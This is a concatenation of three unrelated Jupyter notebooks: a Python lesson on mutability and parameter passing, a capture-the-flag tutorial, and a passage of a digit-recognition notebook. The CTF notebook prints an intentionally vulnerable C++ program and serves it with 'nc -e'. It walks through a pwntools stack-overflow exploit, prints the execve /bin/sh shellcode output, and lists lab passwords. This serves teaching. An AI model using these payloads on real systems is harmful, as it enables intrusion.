] | 8 | 2020-08-31T18:20:30.000Z | 2022-01-29T22:48:39.000Z | content/07_collections04.ipynb | geozeke/notebooks | 25a708e86d2d51979bf77c268b2b7ed91d33c954 | [
"MIT"
] | null | null | null | 45.929329 | 563 | 0.629943 | [
[
[
"# Pass by Value; Pass by Reference\n\nThis is an important topic in the study of computing. It's tricky to understand at first, but you'll get it with practice. Once you understand this topic (and you will) your programming skills will really take off.\n\nIn an Object Oriented Programming (OOP) language like Python, an Object contains both the data itself and a set of methods (like functions) that can operate on that data. When an Object is created it is assigned a unique Object id, often referred-to as its memory address or ***Pointer***. An immutable Object can't be changed once it's created; and a mutable Object can be changed once it's created. Here's a list of mutable and immutable data types that we've seen so far:\n\n#### Immutable Data Types\n\n* String\n* Int\n* Bool\n* Float\n* Tuple\n\n#### Mutable Data Types\n\n* List\n* Dictionary\n* Set\n\nThe concept of mutability can be difficult to understand. We've discussed it in previous notebooks, but consider the code below:",
"_____no_output_____"
]
],
[
[
"s = \"Go Navy\"\nprint(s)\ns = \"Beat Army\"\nprint(s)\n",
"_____no_output_____"
]
],
[
[
"Doesn't that make `s` mutable? Saying a variable is immutable means that it can't be changed, but it sure looks like `s` is changing. What's going on?\n\nIn the code above, we're not changing (mutating) `s`, we're actually throwing away the old Object associated with `s` and creating an entirely new Object for `s`. To illustrate this, remember: ***When an Object is created it is assigned a unique Object id.*** Python provides a built-in function to display an Object's id and we can use it to see how `s` is assigned a new string Object as the code runs:",
"_____no_output_____"
]
],
[
[
"s = \"Go Navy\" # Create a new string Object\nprint(s)\nprint(id(s))\ns = \"Beat Army\" # Create a different string Object (throwing the old one away)\nprint(s)\nprint(id(s))\n",
"_____no_output_____"
]
],
[
[
"Run the code above and observe how `s` gets a new Object id when it goes from `Go Navy` to `Beat Army`. The variable `s` is immutable, but we can discard its Object and create a new one. That's different from changing an immutable variable. To see this, examine the code below. Since the variable `s` is immutable, the code will crash:",
"_____no_output_____"
]
],
[
[
"s = \"Go Navy\"\nprint(\"The first letter is\", s[0])\ns[0] = 'B'\nprint(\"The first letter is\", s[0])\n",
"_____no_output_____"
]
],
[
[
"We can *access* individual letters in a string (line 2), but the code crashes at line 3 because we cannot *change* (mutate) individual letters in a string.",
"_____no_output_____"
],
[
"### Passing Variables to Functions\n\nUnderstanding how Python handles Objects is key to understanding the difference between ***Pass by Value*** and ***Pass by Reference***. A simple set of rules emerges:\n\n* If you pass an immutable variable to a function as an argument, any changes the function makes to the associated parameter <ins>**will not**</ins> affect the value of the original argument. We call this ***Pass by Value***.\n* If you pass a mutable variable to a function, any changes the function makes to the associated parameter <ins>**will**</ins> affect the value of the original argument. We call this ***Pass by Reference***.\n\nProgramming with those simple rules in mind is enough, and you'll get it right if you understand them. It's okay if you just memorize them for now, but you're more advanced than that. You're becoming a skilled programmer and the sky is the limit. It's been long journey, and the journey will continue throughout your entire life, but as you embark on the next phase you're now ready to hear the unvarnished truth: [***All Python Variables are Actually Pointers to Objects***](https://medium.com/@abdullah.tech/python-variables-are-pointers-c8b85880f21e).\n\nLet's start with a simple function that takes an integer and returns double that value:",
"_____no_output_____"
]
],
[
[
"def doubleIt(base):\n return 2 * base\n\n\nn = int(input(\"Enter an integer: \"))\nprint(f\"2 x {n:,d} = {doubleIt(n):,d}\")\n",
"_____no_output_____"
]
],
[
[
"Run the code above and explore how it works. You should be comfortable with the use of *f-strings*.\n\n<hr>\n\nNow let's use Python's [id()](https://docs.python.org/3/library/functions.html) function to examine the unique id numbers of the variables being used:",
"_____no_output_____"
]
],
[
[
"def doubleIt(x):\n print(f\"Inside function: x = {x:,d}; id(x) = {id(x):d}\")\n return 2 * x\n\n\nn = int(input(\"Enter an integer: \"))\nprint(f\"Outside function before call: n = {n:,d}; id(n) = {id(n):d}\")\nprint(f\"2 x {n:,d} = {doubleIt(n):,d}\")\nprint(f\"Outside function after call: n = {n:,d}; id(n) = {id(n):d}\")\n",
"_____no_output_____"
]
],
[
[
"The id of `x` (the function parameter) should be the same as the id of `n` (the argument in the function call). That's because Python is passing `n` as a Pointer for use in the function `doubleIt()`. Now let's examine what happens if we change the value of the `x` parameter inside the function:",
"_____no_output_____"
]
],
[
[
"def doubleIt(x):\n print(f\"Inside function before mod: x = {x:,d}; id(x) = {id(x):d}\")\n x *= 2\n print(f\"Inside function after mod: x = {x:,d}; id(x) = {id(x):d}\")\n return x\n\n\nn = int(input(\"Enter an integer: \"))\nprint(f\"Outside function before call: n = {n:,d}; id(n) = {id(n):d}\")\nprint(f\"2 x {n:,d} = {doubleIt(n):,d}\")\nprint(f\"Outside function after call: n = {n:,d}; id(n) = {id(n):d}\")\n",
"_____no_output_____"
]
],
[
[
"Run the code. Notice that the parameter `x` starts with the same id as the argument `n`. It then gets a new id inside the function, however the id of `n` never changes. Since the argument `n` is an immutable type (integer) any changes to `x` are local in scope to `doubleIt()` and have no impact on the value of `n`. We we would call this situation ***Pass by Value***.\n\n### Passing by Reference\n\nSo, if you pass an immutable variable to a function as an argument, any changes the function makes to the associated parameter <ins>**will not**</ins> affect the value of the original argument. We call this ***Pass by Value***. Now let's take a look at how it works using a mutable variable type. We'll tweak the code to take a Python list and double the second item in the list:",
"_____no_output_____"
]
],
[
[
"def modifySecond(aList):\n print(\n f\"Inside function before mod: aList = {str(aList):s}; id(aList) = {id(aList):d}\")\n aList[1] = 100\n print(\n f\"Inside function after mod: aList = {str(aList):s}; id(aList) = {id(aList):d}\")\n return\n\n\nL = [2, 4, 6]\nprint(f\"Outside function before call: L = {str(L):s}; id(L) = {id(L):d}\")\nmodifySecond(L)\nprint(f\"Outside function after call: L = {str(L):s}; id(L) = {id(L):d}\")\n",
"_____no_output_____"
]
],
[
[
"Lots going on here:\n\n* I'm making use of Python's [str()](https://docs.python.org/3/library/stdtypes.html#str) function which takes a variable and provides a string representation of it. Very handy when using *f-strings* with lists.\n* Notice that I use a single `return` at the end of my function, with nothing after it. Using return all by itself means I'm actually returning a special pointer called [None](https://docs.python.org/3/library/constants.html#None). You could leave the `return` statement off all together and it would still work, but it enhances your code's clarity to delineate the end of your function with a solitary `return` statement.\n* The id of our list never changes. It's the same outside the function as well as inside.\n* Since Python lists are mutable, any changes we make to the parameter `aList` (inside the function) ***will*** impact the argument `L` (outside the function).\n\nThat's ***Passing by Reference***. If you pass a mutable variable to a function as an argument, any changes the function makes to the associated parameter <ins>**will**</ins> affect the value of the original argument. We call this ***Pass by Reference***.\n\nIf all this makes your head hurt, just take a deep breath. Learning and truly internalizing this topic can take a long time, but with practice you'll get it. Python is interesting, because all variables are actually holding Pointers to Objects, but the concepts of ***Pass by Value*** and ***Pass by Reference*** still help us control the behavior of our code. For now, just remember:\n\n* Changes to immutable variables passed to functions ***don't*** have an impact outside the function (***Pass by Value***).\n* Changes to mutable variables passed to functions ***do*** have an impact outside the function (***Pass by Reference***).",
"_____no_output_____"
],
[
"## Additional Resources\n\n[Parameter Passing in Python](https://www.python-course.eu/passing_arguments.php)\n\n[All Python Variables are Actually Pointers to Objects](https://medium.com/@abdullah.tech/python-variables-are-pointers-c8b85880f21e)\n\n[What is the None keyword in Python?](https://www.educative.io/edpresso/what-is-the-none-keyword-in-python)\n\n[Tricky Python II: Parameter Passing for Mutable & Immutable Objects](https://medium.com/@tyastropheus/tricky-python-ii-parameter-passing-for-mutable-immutable-objects-10e968cbda35)",
"_____no_output_____"
],
[
"<hr>\n\n*MIT License*\n\n*Copyright 2019-2022 Peter Nardi*\n\n*Terms of use:*\n\n*Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:*\n\n*The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.*\n\n*THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.*",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
e708d91c178bc6a4a827c43eb77286fb16f54b38 | 25,591 | ipynb | Jupyter Notebook | CTF.ipynb | rambasnet/Hacking-CPP-Notebooks | 403371415f406204701b74667502b642c18390af | [
"MIT"
] | 1 | 2022-01-19T16:40:29.000Z | 2022-01-19T16:40:29.000Z | CTF.ipynb | rambasnet/SystemSecurity | 403371415f406204701b74667502b642c18390af | [
"MIT"
] | null | null | null | CTF.ipynb | rambasnet/SystemSecurity | 403371415f406204701b74667502b642c18390af | [
"MIT"
] | null | null | null | 34.960383 | 704 | 0.541284 | [
[
[
"# Capture The Flag (CTF)\n\n- How the Best Hackers Learn Their Craft: [Watch YouTube](https://www.youtube.com/watch?v=6vj96QetfTg&t=214s&ab_channel=RSAConference)\n\n## online CTF\n- Learn CTF - https://ctflearn.com/\n- PicoCTF - https://picoctf.org/\n\n## pwntools and CTF\n- pwntools is designed for quick exploitation in CTF environments\n- most CTF environments use client-server architecture\n - flag is on the server\n - you interact to the server from a remote client\n - exploit the server program and capture the flag (CTF)\n \n- you can easily create a server using netcat (nc) program in listening mode\n- you can also execute a binary/program when client connects to it\n- let's look into the `ctf-demos/basic` folder that tries to simulate the CTF-like environment\n- we'll use the `ctf-demos/basic/vuln.cpp` program to demonstrate how **pwntools** framework can be used to create exploit code using Python\n- a good YouTube video on Pwn Template and Input / Output is found here: https://www.youtube.com/watch?v=NhNbivMVPk0&ab_channel=ChristopherSchafer](https://www.youtube.com/watch?v=NhNbivMVPk0&ab_channel=ChristopherSchafer)\n\n## Netcat (nc)\n- https://en.wikipedia.org/wiki/Netcat\n- https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf\n- `nc` - networking utility for reading from and writing to network connections using TCP or UDP\n- can be very useful to transfer file between computers with limited resources",
"_____no_output_____"
]
],
[
[
"! ls -al ./ctf-demos/basic",
"total 76\ndrwxr-xr-x 2 kali kali 4096 Apr 12 23:41 .\ndrwxr-xr-x 5 kali kali 4096 Jan 15 14:09 ..\n-rw-r--r-- 1 kali kali 2318 Jan 15 14:09 exploit_demo.py\n-rw-r--r-- 1 kali kali 1334 Jan 15 14:09 exploit_getoffset.py\n-rwxr-xr-x 1 kali kali 1898 Jan 15 14:09 exploit.py\n-rw-r--r-- 1 kali kali 2576 Jan 15 14:09 exploit_vuln.py\n-rw-r--r-- 1 kali kali 17 Jan 15 14:09 flag.txt\n-rw-r--r-- 1 kali kali 1054 Feb 10 21:12 Makefile\n-rw-r--r-- 1 kali kali 116 Jan 15 14:09 netcat-loop.sh\n-rw-r--r-- 1 kali kali 1321 Jan 15 14:09 vuln.cpp\n-rwxr-xr-x 1 root root 33668 Apr 12 23:41 vuln.exe\n"
],
[
"! cat ./ctf-demos/basic/vuln.cpp",
"#include <stdio.h>\n#include <string.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <iostream>\nusing namespace std;\n\n#define BUFSIZE 128\n\nusing namespace std;\n\nvoid give_shell(){\n // Set the gid to the effective gid\n // this prevents /bin/sh from dropping the privileges\n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n system(\"/bin/sh\");\n}\n\nchar * mgets(char *dst) {\n char *ptr = dst;\n int ch; \n\t/* skip leading white spaces */ \n while ((ch = getchar()) && (ch == ' ' or ch == '\\t') )\n ; \n\n if ((ch == '\\n') or (ch == EOF)) { \n *ptr = '\\0';\n return dst; \n } \n else\n *ptr = ch;\n\n /* now read the rest until \\n or EOF */ \n while (true) {\n ch = getchar();\n if (ch == '\\n' or ch == EOF) break;\n *(++ptr) = ch; \n }\n *(++ptr) = 0;\n return dst;\n}\n\nvoid bad() {\n char buffer[BUFSIZE];\n printf(\"buffer is at %p\\n\", buffer);\n cout << \"Give me some text: \";\n fflush(stdout);\n mgets(buffer); // similar to C's gets;\n //gets(buffer); // depricated in C++\n cout << \"Acknowledged: \" << buffer << \" with length \" << strlen(buffer) << endl;\n}\n\nint main(int argc, char *argv[]) {\n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n bad();\n cout << \"Good bye!\\n\";\n return 0;\n}"
]
],
[
[
"### compile and run as a server\n\n- `make` command must be run as sudo, as the Makefile also disables randomize_va_space\n- inorder to use make and the Python exploit code easily, we'll change the working directory to ctf-demos/basic\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking]\n└─$ cd ctf-demos/basic \n- must run make with sudo to disable randomaize_va_space\n\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ sudo make \n[sudo] password for kali: \n# must run make with sudo to disable randomaize_va_space\necho 0 | tee /proc/sys/kernel/randomize_va_space\n0\ng++ -g -Wall -m32 -fno-stack-protector -z execstack -no-pie vuln.cpp -o vuln.exe \n\n```\n\n- let's make sure the target binary vuln.exe doesn't have any security controls in place to prevent overflow exploitation\n- we can use pwntools **checksec** command\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ pwn checksec vuln.exe \n[*] Checking for new versions of pwntools\n To disable this functionality, set the contents of /home/kali/.cache/.pwntools-cache-3.8/update to 'never' (old way).\n Or add the following lines to ~/.pwn.conf (or /etc/pwn.conf system-wide):\n [update]\n interval=never\n[*] You have the latest version of Pwntools (4.3.1)\n[*] '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe'\n Arch: i386-32-little\n RELRO: Partial RELRO\n Stack: No canary found\n NX: NX disabled\n PIE: No PIE (0x8048000)\n RWX: Has RWX segments\n\n```\n\n- you can follow the instruction shown to never check for the pwntools update\n\n- make sure the nc server is listening on localhost port 1234 to run vuln.exe on client's connection\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ nc -v -l 127.0.0.1 -p 1234 -e vuln.exe\nlistening on [any] 1234 ...\nconnect to [127.0.0.1] from localhost [127.0.0.1] 38332\n\n```\n\n- open another terminal and run netcat to connect to the server \n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ nc localhost 1234 \nbuffer is at 0xffffc360\nGive me some text: sdf\nAcknowledged: sdf with length 3\nGood bye!\n```\n\n- NOTE that when the netcat server finished executing the vuln.exe program upon client's connection, the server then stops\n- you'll have to manually run the netcat server again inorder to interact from a client again...\n- this can be annoying as we'll have to interact with the vulnerable program many times\n- the following bash script comes to our rescue!",
"_____no_output_____"
]
],
[
[
"! cat ./ctf-demos/basic/netcat-loop.sh",
"_____no_output_____"
]
],
[
[
"- from one terminal, run the bash script, so server is listening indefinitely one clinet after another\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ bash netcat-loop.sh \nlistening on [any] 1234 ...\n\nconnect to [127.0.0.1] from localhost [127.0.0.1] 38336\nlistening on [any] 1234 ...\nconnect to [127.0.0.1] from localhost [127.0.0.1] 38340\nlistening on [any] 1234 ...\n```\n\n- from another terminal, continously connect to the server without having to rerun the server!\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ nc localhost 1234 \nbuffer is at 0xffffc360\nGive me some text: sdf\nAcknowledged: sdf with length 3\nGood bye!\n```",
"_____no_output_____"
],
[
"## Remote CTF Demo\n- use `pwntools` to create a exploit code template\n- to create exploit template, we need the following:\n - name of the target program\n - ip of the host the binary will be running on (use 127.0.0.1 loopback for localhost as in this demo)\n - the port number the server is listening on (pick unuser higher port numbers (above 1024)\n - for online CTF, provide the server's IP and port typically provided to the contestents\n\n```bash\n(base) kali@kali:~/EthicalHacking/demos/ctf$ pwn template ./vuln.exe --host localhost --port 1234 > exploit.py\n```\n\n- the generated `exploit.py` file provides a lot of boiler-plate code:\n - for automatically detecting architecture of the target program\n - stdio framework to interact with the target program locally\n - locally meaning accessing program.exe directly from a terminal\n - remotely meaning accessing a host via tcp/ip (ip:port)\n - the same code works without little or no modification locally and remotely\n - debug feature to display hexdump of stdio\n - feature to generate the shellcode, etc.\n\n- let's look at the content of the `exploit.py`\n\n```python\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# This exploit template was generated via:\n# $ pwn template ./vuln.exe --host 127.0.0.1 --port 1234\nfrom pwn import *\n\n# Set up pwntools for the correct architecture\nexe = context.binary = ELF('./vuln.exe')\n\n# Many built-in settings can be controlled on the command-line and show up\n# in \"args\". For example, to dump all data sent/received, and disable ASLR\n# for all created processes...\n# ./exploit.py DEBUG NOASLR\n# ./exploit.py GDB HOST=example.com PORT=4141\nhost = args.HOST or '127.0.0.1'\nport = int(args.PORT or 1234)\n\ndef local(argv=[], *a, **kw):\n '''Execute the target binary locally'''\n if args.GDB:\n return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)\n else:\n return process([exe.path] + argv, *a, **kw)\n\ndef remote(argv=[], *a, **kw):\n '''Connect to the process on the remote host'''\n io = connect(host, port)\n if args.GDB:\n gdb.attach(io, gdbscript=gdbscript)\n return io\n\ndef start(argv=[], *a, **kw):\n '''Start the exploit against the target.'''\n if args.LOCAL:\n return local(argv, *a, **kw)\n else:\n return remote(argv, *a, **kw)\n\n# Specify your GDB script here for debugging\n# GDB will be launched if the exploit is run via e.g.\n# ./exploit.py GDB\ngdbscript = '''\ntbreak main\ncontinue\n'''.format(**locals())\n\n#===========================================================\n# EXPLOIT GOES HERE\n#===========================================================\n# Arch: i386-32-little\n# RELRO: Partial RELRO\n# Stack: No canary found\n# NX: NX disabled\n# PIE: No PIE (0x8048000)\n# RWX: Has RWX segments\n\nio = start()\n\n# shellcode = asm(shellcraft.sh())\n# payload = fit({\n# 32: 0xdeadbeef,\n# 'iaaa': [1, 2, 'Hello', 3]\n# }, length=128)\n# io.send(payload)\n# flag = io.recv(...)\n# log.success(flag)\n\nio.interactive()\n\n```\n\n- now let's do a quick test of the exploit code\n- make sure the nc server is listening on localhost port 1234 to run vuln.exe on connection\n- use the `netcat-loop.sh` script to run server in the loop\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ bash netcat-loop.sh \nlistening on [any] 1234 ...\n```\n\n- open another terminal and run the exploit code exploit.py \n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ python exploit.py\n[*] '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe'\n Arch: i386-32-little\n RELRO: 
Partial RELRO\n Stack: No canary found\n NX: NX disabled\n PIE: No PIE (0x8048000)\n RWX: Has RWX segments\n[+] Opening connection to localhost on port 1234: Done\n[*] Switching to interactive mode\nbuffer is at 0xffffc360\nGive me some text: $ do you copy this?\nAcknowledged: do you copy this? with length 17\nGood bye!\n[*] Got EOF while reading in interactive\n$ \n$ \n[*] Closed connection to localhost port 1234\n[*] Got EOF while sending in interactive\n```\n\n### Update Exploit code\n- the vulnerable program is exactly the same as the stack_overflow/so_stdio.cpp\n- the exploit code is also exactly the same as a result to send and execute shellcode from the vulnerable program's stack\n- let's look at the updated exploit code `exploit_vuln.py` file\n\n### Find offset of buffer\n- run the `exploit_getoffset.py` script to automatically run the binary locally, crash and find the offset from coredump\n- you can also use `gdb-peda`\n- offset is same locally or remotely as long as the the program is run on the same architecture\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ python exploit_getoffset.py 1 ⨯ 1 ⚙\n[*] '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe'\n Arch: i386-32-little\n RELRO: Partial RELRO\n Stack: No canary found\n NX: NX disabled\n PIE: No PIE (0x8048000)\n RWX: Has RWX segments\n[+] Starting local process '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe': pid 11262\n[*] Process '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe' stopped with exit code -11 (SIGSEGV) (pid 11262)\n[+] Parsing corefile...: Done\n[*] '/home/kali/EthicalHacking/ctf-demos/basic/core.11262'\n Arch: i386-32-little\n EIP: 0x61616161\n ESP: 0xffffc3a0\n Exe: '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe' (0x8049000)\n Fault: 0x61616161\noffset = 144\n```\n- use the offset to generate and send the payload",
"_____no_output_____"
]
],
[
[
"! cat ./ctf-demos/basic/exploit_vuln.py",
"_____no_output_____"
]
],
[
[
"- run the updated exploit code\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/basic]\n└─$ python exploit_vuln.py 1 ⨯ 1 ⚙\n[*] '/home/kali/EthicalHacking/ctf-demos/basic/vuln.exe'\n Arch: i386-32-little\n RELRO: Partial RELRO\n Stack: No canary found\n NX: NX disabled\n PIE: No PIE (0x8048000)\n RWX: Has RWX segments\n[+] Opening connection to 127.0.0.1 on port 1234: Done\nb'Give me some text: Acknowledged: \\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x901\\xc0Ph//shh/bin\\x89\\xe31\\xc9\\x89\\xcaj\\x0bX\\xcd\\x80`\\xc3\\xff\\xff`\\xc3\\xff\\xff`\\xc3\\xff\\xff`\\xc3\\xff\\xff`\\xc3\\xff\\xff with length 144\\n'\n[*] Switching to interactive mode\n$ \n$ whoami\nkali\n$ date\nTue Dec 29 15:40:46 MST 2020\n$ \n```",
"_____no_output_____"
],
[
"### run Python exploit with arguments\n\n```bash\n$ python exploit_vuln.py LOCAL\n$ python exploit_vuln.py HOST=127.0.0.1 PORT=1234\n```",
"_____no_output_____"
],
[
"## Invoking libc functions in Python\n- need https://docs.python.org/3/library/ctypes.html\n\n## Find local libc.so file\n- one way to do that is using `ldd` command along with a C/C++ binary",
"_____no_output_____"
]
],
[
[
"! ldd demo.exe\n# see libc.so.6 file",
"\tlinux-gate.so.1 (0xf7fc9000)\n\tlibstdc++.so.6 => /lib32/libstdc++.so.6 (0xf7d83000)\n\tlibc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7b8f000)\n\tlibm.so.6 => /lib/i386-linux-gnu/libm.so.6 (0xf7a8b000)\n\t/lib/ld-linux.so.2 (0xf7fcb000)\n\tlibgcc_s.so.1 => /lib/i386-linux-gnu/libgcc_s.so.1 (0xf7a64000)\n"
],
[
"from ctypes import *",
"_____no_output_____"
],
[
"# invoke a C function in Python\nlibc = cdll.LoadLibrary(\"libc.so.6\")",
"_____no_output_____"
],
[
"libc.printf(b\"Hello!\\n\")\n# actual output is not seen on Jupyter notebook... only shows the no. of bytes printed",
"7\n"
],
[
"# run script file instead\n! cat ctf-demos/rop1/libc.py",
"#! /usr/bin/env python3\n\n# how to invoke C function in Python\nfrom ctypes import *\nlibc = cdll.LoadLibrary(\"/lib/x86_64-linux-gnu/libc.so.6\")\nlibc.printf(b\"Hello World\\n\")\n\n"
],
[
"# run script instead\n! python ctf-demos/rop1/libc.py",
"Hello World\n"
]
],
[
[
"## Tinycore Capture The Flag (CTF)\n- Download and install as a VM: - https://ctf-o-matic.github.io/capture-the-flag/\n- Based on Strip CTF: https://stripe.com/blog/capture-the-flag\n- Level 5 readme correction:\n - Webservice is running at port 8005 not at 9020 as the motd.txt description says\n - `$curl localhost:8005 -d \"hello there\"`\n- Hints: https://github.com/dividuum/stripe-ctf\n- Learn about Tinycore Linux: [http://tinycorelinux.net/intro.html](http://tinycorelinux.net/intro.html)\n- Has 6 levels\n\n### level00@box has two files: motd.txt and tools.txt\n- cat tools.txt to get some general ideas about the tools and technqiues\n- motd.txt describes about TinyCore CTF and the information on what to do to get to the next level\n\n### Installing apps and tools - Use Tiny Core Extension: Application Browser\n- Let's say you want to install gcc; first switch to `tc` user\n```bash\n$ su tc\n$ tce \n```\n- search for: compile\n- install compiletc package which installs everything to compile using gcc\n\n### Now compile level01.c program\n- how to edit? Use vi or nano\n- or locally edit and upload using Netcat\n- TinyCoreCTF doens't have GUI to work with files so one can send files back-and-forth to a GUI supported Linux environment\n - if you want to send file to TinyCore do the following:\n - on Tinycore run netcat in listening mode:\n - `$ nc -v -l -p [port] > filename` \n - from Kali Linux send a file:\n - `$ cat file | nc -v [tinycoreIP] [tinycorePort]`",
"_____no_output_____"
],
[
"## Hints\n- see all the levels\n```bash\n$ cd /levels\n```",
"_____no_output_____"
],
[
"### level00\n- nothing to do here; but just be familiar with the CTF\n- password (izeecahd) is in /home/level00/.password\n```bash\n$ cd /levels/level00\n$ cat /home/level00/.password\n```\n- this folder is empty",
"_____no_output_____"
],
[
"### level01\n- create a program that can read the password/flag for level01 user\n- use levels/level01 files to make it happen\n- password (aepeefoo) is in /home/level01/.password\n- see the contents of level01\n```bash\n$ cd /levels/level01/\n```",
"_____no_output_____"
],
[
"### level02\n- web-based vulnerability\n- password (quemaosh) is in /home/level02/.password file\n- force the webserver to read the password file and display the content as response\n- see the contents of /levels/level02/ folder\n```bash\n$ curl http://localhost:8002\n$ less /levels/level02/level02.py\n$ curl --cookie \"some_cookie=value\" http://localhost:8002\n```\n- can use browser from host to interact with the form\n- http://[ip]:8002/\n- use cookie editor plugin for chrome or proxy tool such as owasp zap or burpuite that come with Kali",
"_____no_output_____"
],
[
"### level03\n- password (eingaima) for level03 is in /home/level03/.password file\n- files in /levels/level03 may be useful\n- binary level03 provides some functionalites to work with some string\n\n```bash\n$ cd /levels/level03\n$ ls\n$ ./level03\n$ ./level03 0 \"hello world\"\n\n```\n- negative index?\n- carefully read level03.c file\n- fns is array of function addresses, find the offset of depricated run function\n- pass it with proper offset to get the run function to execute\n- use gdb or write a script to bruteforce it!",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
e708e49417a17894603fa5211a668ea344c3dc2a | 11,556 | ipynb | Jupyter Notebook | digit-recognition.ipynb | Uamhan/Emerging-technologies-assignments | 3bda752df2f649df38e9655e670f52a0a6b8ed5c | [
"Apache-2.0"
] | null | null | null | digit-recognition.ipynb | Uamhan/Emerging-technologies-assignments | 3bda752df2f649df38e9655e670f52a0a6b8ed5c | [
"Apache-2.0"
] | null | null | null | digit-recognition.ipynb | Uamhan/Emerging-technologies-assignments | 3bda752df2f649df38e9655e670f52a0a6b8ed5c | [
"Apache-2.0"
] | null | null | null | 42.959108 | 1,074 | 0.676964 | [
[
[
"## Digit recognition\n\nIn this note book we will cover the digit recognition python script also found in this repositiory. we will first break the script down into three sections. first the machine learning section, which trainings the model used to make the predictions. the second section will be how we get the users image and manipulate it and third will be the user interface generated by the script.",
"_____no_output_____"
],
[
"### Machine learning\n\nThis section will discuss the the main bulk of the functional code in this script. all of this code is containted withing the predict_image method that takes the user image as input. this method imports the mnist data set from the keras library into testing and training sets to be used with the model we create. This section is broken down into three main components the model that we will train. the training section itself and finaly the predicition process.This will be concluded by discussing the performance of the model and predicitions.\n\n#### Model\n\nThe first step in our machine learning predicition is to create/load the Model we will be using to make predicitions.\nAt first the script will try to load a pre existing model. if it is not present it will create the model.\n\nThis model is a keras sequential model this tells us that the layers are in a linear stack. i have decided to go with keras Conv2d Layers predominatly for this model (convolutional layer specificaly for 2d images)as they are very effective in visual based scenarios.\n\nThe first layer of our model is a conv2D layer with 32 nodes. a kernal size of (3,3) which refers to the width x height of the filter mask. it has its activation function set to relu this stands for Rectifier or rectified linear unit this activation function is used comonly in computer vision tasks. finaly it has an input shape of (28,28,1) whitch models out mnist data set image dimensions.\n",
"_____no_output_____"
]
],
[
[
"# model.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=input_shape))",
"_____no_output_____"
]
],
[
[
"the next layer is much the same but this time the conv2D layer has 64 nodes instead of 32",
"_____no_output_____"
]
],
[
[
"# model.add(Conv2D(64, (3, 3), activation='relu'))",
"_____no_output_____"
]
],
[
[
"We then apply a max pooling of (2,2) which reduces our output shape from the previos layer from (3,3) to (2,2) taking the max pixel values.",
"_____no_output_____"
]
],
[
[
"# model.add(MaxPooling2D(pool_size=(2, 2)))",
"_____no_output_____"
]
],
[
[
